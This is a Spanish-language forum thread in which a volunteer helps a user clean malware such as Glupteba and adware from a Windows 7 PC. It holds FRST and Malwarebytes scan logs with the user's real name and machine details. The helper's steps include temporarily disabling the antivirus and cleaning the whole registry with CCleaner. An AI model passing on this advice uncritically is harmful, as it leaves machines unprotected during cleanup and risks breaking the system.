==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AIPS => 2
MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdPlusAndroidSvc => 3
MSCONFIG\Services: CG6Service => 2
MSCONFIG\Services: CGVPNCliService => 2
MSCONFIG\Services: ExpressVPNService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Http_analyzer_v7_netfilter => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: ZenMate5Service => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DishAnywherePlayerShortcut.lnk => C:\Windows\pss\DishAnywherePlayerShortcut.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Recorte de pantalla y Selector de OneNote 2010.lnk => C:\Windows\pss\Recorte de pantalla y Selector de OneNote 2010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Samsung Auto Backup Guage.lnk => C:\Windows\pss\Samsung Auto Backup Guage.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EgisTecLiveUpdate => "C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe"
MSCONFIG\startupreg: ExpressVPNNotificationService => "C:\Program Files (x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe"
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe
MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
MSCONFIG\startupreg: movavi_videoconverter_agent => "C:\Users\MARCO AVILA\AppData\Roaming\Movavi Video Converter 19 Premium\ConverterAgent.exe"
MSCONFIG\startupreg: mwlDaemon => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
MSCONFIG\startupreg: PDF7 Registry Controller => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe
MSCONFIG\startupreg: PDFHook => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe
MSCONFIG\startupreg: PDVD8LanguageShortcut => "c:\Program Files (x86)\CyberLink\PowerDVD8\Language\Language.exe"
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl8 => "c:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe"
MSCONFIG\startupreg: SmileboxTray => "C:\Users\MARCO AVILA\AppData\Roaming\Smilebox\SmileboxTray.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: UVS10 Preload => C:\Program Files (x86)\Ulead Systems\Ulead VideoStudio SE DVD\uvPL.exe

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [TCP Query User{366F23B0-A93E-4D27-B27D-4C35A39332F0}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{773046CB-4887-40F8-98FF-F54E014350F5}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [TCP Query User{AF830F9F-477D-4255-97FE-0EF0EE55F200}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{C917BBB9-BA08-4078-8791-8322937FFD69}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{82E9CFC6-B7F1-4B31-BE71-99752572EEDA}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{79697472-7464-49E5-9290-00A065F43C82}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E9602492-F37B-4240-89B7-0C70ADE2AA71}] => (Allow) LPort=2869
FirewallRules: [{CFA1B78C-0293-4EC5-83D9-62BEDDB4D8B1}] => (Allow) LPort=1900
FirewallRules: [{67173E6A-BAA6-439D-AB77-C2FE749C1E33}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{BFE4D6F8-9081-4A1C-9456-3D756F608CED}] => (Allow) LPort=2869
FirewallRules: [{D43C1EF5-D2E0-475D-8975-343493D398E5}] => (Allow) LPort=1900
FirewallRules: [{26F2DF09-DEDA-4C43-8887-69F78A6F9CB0}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{0A9103B6-E567-48CD-ABA1-3EB2A1C6A7AB}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{204D78B9-4BE4-417F-AB44-1EFB9AB5F18E}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [{F27355F9-E64C-42A5-8A0E-CEB5F9244A6F}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe (Hewlett-Packard Company -> Hewlett-Packard)
FirewallRules: [{547421D3-D7AA-491A-9433-45EFB8C8A9C2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CBF6769F-1DE4-4E7C-8354-72141872CBFF}] => (Allow) LPort=1542
FirewallRules: [{3A8FA1B7-0C8D-4CBD-9DF7-CDFA95A258FE}] => (Allow) LPort=1542
FirewallRules: [{2D4648E6-3E13-4A06-B05F-FC1576F10700}] => (Allow) LPort=53
FirewallRules: [{4513D140-DC13-4D7D-A936-C1D35415CD84}] => (Allow) LPort=1542
FirewallRules: [{327D53F6-CA13-48CE-B0B3-467850291634}] => (Allow) LPort=1542
FirewallRules: [{E8584AE4-943A-4762-AE3C-8600F07B0540}] => (Allow) LPort=53
FirewallRules: [{3B898225-EBA1-4B29-83E8-3344D84E1C64}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{95BDBC3E-EA4E-4D1A-B014-314290E4C259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{CFC593AB-A208-4022-A242-A49F41139E65}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{5CF3FFBD-64A8-48B9-A708-3E45719BDF50}] => (Allow) LPort=1688
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3

==================== Puntos de Restauración =========================




==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: ExpressVPN TAP Adapter
Description: ExpressVPN TAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ExpressVPN
Service: tapexpressvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Synaptics PS/2 Port TouchPad
Description: Synaptics PS/2 Port TouchPad
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Synaptics
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (03/26/2020 06:42:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xfd8
Hora de inicio de la aplicación con errores: 0x01d603d07e823f47
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: c92a40aa-6fc3-11ea-9672-00262d6f27b2

Error: (03/26/2020 06:41:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Nombre del módulo con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x00004fa9
Id. del proceso con errores: 0x47c
Hora de inicio de la aplicación con errores: 0x01d603d04ff92c2d
Ruta de acceso de la aplicación con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Ruta de acceso del módulo con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Id. del informe: c123b114-6fc3-11ea-9672-00262d6f27b2

Error: (03/26/2020 06:40:49 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/26/2020 06:19:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xcc0
Hora de inicio de la aplicación con errores: 0x01d603cd4612a2d3
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 91250054-6fc0-11ea-a561-00262d6f27b2

Error: (03/26/2020 06:18:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/26/2020 06:05:06 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {3a3ec622-de8a-4bb6-8b23-165573a7ea91}

Error: (03/26/2020 05:55:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xf5c
Hora de inicio de la aplicación con errores: 0x01d603c9f87faba0
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 44bc83c0-6fbd-11ea-b27e-00262d6f27b2

Error: (03/26/2020 05:55:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Nombre del módulo con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x00004fa9
Id. del proceso con errores: 0x75c
Hora de inicio de la aplicación con errores: 0x01d603c9cd7e275c
Ruta de acceso de la aplicación con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Ruta de acceso del módulo con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Id. del informe: 4148379e-6fbd-11ea-b27e-00262d6f27b2


Errores del sistema:
=============
Error: (03/26/2020 06:44:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:03 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:44:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:03 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:44:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:02 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:43:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:43:58 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.


Windows Defender:
===================================
Date: 2015-03-24 06:23:24.821
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{C4B00BA7-6BCC-412D-890A-A12E0BF6C8FF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2015-03-03 06:00:49.092
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{A4A05D0B-9AFA-4E8F-9B47-13063FE90563}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2012-04-10 21:48:48.719
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:Win32/Agent.gen!A&threatid=135442
Nombre:Backdoor:Win32/Agent.gen!A
Id.:135442
Gravedad:Grave
Categoría:Puerta trasera
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe;file:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe->(ZipSfx)->server.exe
Tipo de detección:Genérico
Origen de detección:Sistema
Estado:Desconocido
Usuario:NT AUTHORITY\SYSTEM
Nombre de proceso:

Date: 2010-07-04 23:15:31.293
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Adload.BK&threatid=150859
Nombre:TrojanDownloader:Win32/Adload.BK
Id.:150859
Gravedad:Alta
Categoría:Descargador troyano
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;file:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar->DAEMON Tools Pro Advanced 4.36.0309.0160\DAEMONToolsPro4360309-0160.exe->(nsis-1-$(ENVVAR)\restorepoint.exe);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar
Tipo de detección:Concreto
Origen de detección:Descargas y datos adjuntos
Estado:Desconocido
Usuario:MARCOAVILA-PC\MARCO AVILA
Nombre de proceso:C:\Program Files (x86)\Internet Explorer\iexplore.exe

CodeIntegrity:
===================================

Date: 2020-03-26 18:44:37.986
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Windows\System32\drivers\Winmon.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:37.712
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Windows\System32\drivers\Winmon.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.745
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.470
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.181
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.921
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.364
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.109
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

==================== Información de la memoria =========================== 

BIOS: INSYDE V1.30 09/29/2009
Placa base: Acer Aspire 4810T
Procesador: Genuine Intel(R) CPU U4100 @ 1.30GHz
Porcentaje de memoria en uso: 83%
RAM física total: 3003.79 MB
RAM física disponible: 487.01 MB
Virtual total: 7117.49 MB
Virtual disponible: 1015.31 MB

==================== Unidades ================================

Drive c: (ACER) (Fixed) (Total:453.94 GB) (Free:97.98 GB) NTFS

\\?\Volume{5e7a9bc6-de7f-11de-9b61-806e6f6e6963}\ (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5e7a9bc5-de7f-11de-9b61-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:11.72 GB) (Free:1.48 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BC3BBC3B)
Partition 1: (Not Active) - (Size=11.7 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453.9 GB) - (Type=07 NTFS)

==================== Final de Addition.txt =======================

Hola. :+1:

Sigo viendo en el informe de Addition.txt el programa “CloudNet” SI lo buscas desde el panel de programas instalados de Windows o desde RevoUninstaller a ti NO te aparece…??

Hola!

CloudNet si me sigue apareciendo en ambos, cuando lo desinstalo con Revo desaparece pero vuelve a aparecer después de un tiempo.

Quiero comentarte que desinstalé Malwarebytes y lo volví a instalar y ya lo pude correr, aún no he hecho ningún análisis a menos que tu me lo indiques.

Saludos.

Hola.

Entendido, :+1: entonces ahora sigue estos pasos, en el orden indicado y leyendo todo lo explicado. :+1:

:one: Desactiva temporalmente el Antivirus :arrow_forward: Cómo deshabilitar temporalmente su Antivirus, mientras estemos realizando TODOS los pasos.

Vamos a descargar en TU ESCRITORIO(y NO en otro lugar :face_with_monocle:) todas las herramientas que vamos a utilizar en este procedimiento (pero no las ejecutes todavía) :


:two: Ejecutas las herramientas de una en una y en el orden indicado :



CCleaner.-

  • Instalas y Ejecutas CCleaner siguiendo los pasos indicados en el manual.

  • Úsalo primero en su opción de Limpiador para borrar cookies, temporales de Internet y todos los archivos que te muestre como obsoletos.

  • Después usa su opción de Registro para limpiar todo el registro de Windows(haciendo copia de seguridad).

Malwarebytes.-

  • Instalas y Ejecutas MBAM siguiendo los pasos indicados en el manual.

  • Realiza un Análisis Personalizado. :white_check_mark:

  • Seleccionando TODOS a Cuarentena para enviarlo a la cuarentena y Reinicias el sistema.

  • En el apartado del programa :arrow_forward: Historial de detecciones :arrow_backward: encontrarás el informe de MBAM, que debes copiar y pegar en tu próxima respuesta, para poder analizarlo.

AdwCleaner.-

  • Ejecuta Adwcleaner.exe.

  • Pulsamos en el botón Analizar ahora, y espera a que se realice el proceso, inmediatamente pulsa siempre sobre el botón Iniciar Reparación.

  • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.

  • El log/informe lo encontramos en la pestaña “Informes”, volviendo a abrir el programa si fuese necesario, para poder copiarlo y pegarlo en tu próxima respuesta.

  • El informe también se puede encontrar en C:\AdwCleaner\Logs\AdwCleaner[C00].txt

Junkware Removal Tool.-

  • Ejecuta JRT.exe.

  • Y pulsar cualquier tecla para continuar, esperar pacientemente a que termine el proceso.

  • Si en algún momento te pide Reiniciar hazlo.

  • Al finalizar, un registro/informe (JRT.txt) se guardara en el escritorio y se abrirá automáticamente.

  • Copia y pega el contenido de JRT.txt en tu próxima respuesta.

Farbar Recovery Scan Tool.-

  • Ejecuta FRST.exe.

  • En el mensaje de la ventana del Disclaimer/Responsabilidad, pulsamos Sí/Yes

  • En la ventana principal pulsamos en el botón Analizar/Scan y esperamos a que concluya el proceso.

  • Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

:three: Poner los informes en tu próxima respuesta de :

  • Malwarebytes, AdwCleaner, JRT, FRST + Addition.txt, y en ese orden. :+1:

Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(más de 64.000 caracteres aprox.).

Y nos cuentas como funciona tu equipo en relación al problema planteado. :face_with_monocle:

Saludos.

Hola!

Te comento que he realizado lo que me indicaste en tu ultimo mensaje y al parecer todo ha regresado a la normalidad, han desaparecido las ventanas emergentes y la PC ya no esta lenta, ademas de que al iniciar el ordenador lo hace como antes. A continuación te envío los reportes que me solicitaste.

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 27/3/20
Hora del análisis: 18:12
Archivo de registro: d8b3238e-7088-11ea-a1d1-00262d6f27b2.json

-Información del software-
Versión: 4.1.0.56
Versión de los componentes: 1.0.859
Versión del paquete de actualización: 1.0.21478
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: MAAH-PC\MARCO AVILA

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 422545
Amenazas detectadas: 212
Amenazas en cuarentena: 212
Tiempo transcurrido: 40 min, 31 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 8
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, En cuarentena, 922, 259506, , , , 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En cuarentena, 491, 455564, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, En cuarentena, 424, 379533, , , , 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En cuarentena, 491, 196479, , , , 
Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, En cuarentena, 3712, 667274, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, En cuarentena, 1138, 781246, , , , 
RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, En cuarentena, 7487, 804571, , , , 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], En cuarentena, 0, 392686, , , , 

Módulo: 9
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, En cuarentena, 922, 259506, , , , 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En cuarentena, 491, 455564, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, En cuarentena, 424, 379533, , , , 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En cuarentena, 491, 196479, , , , 
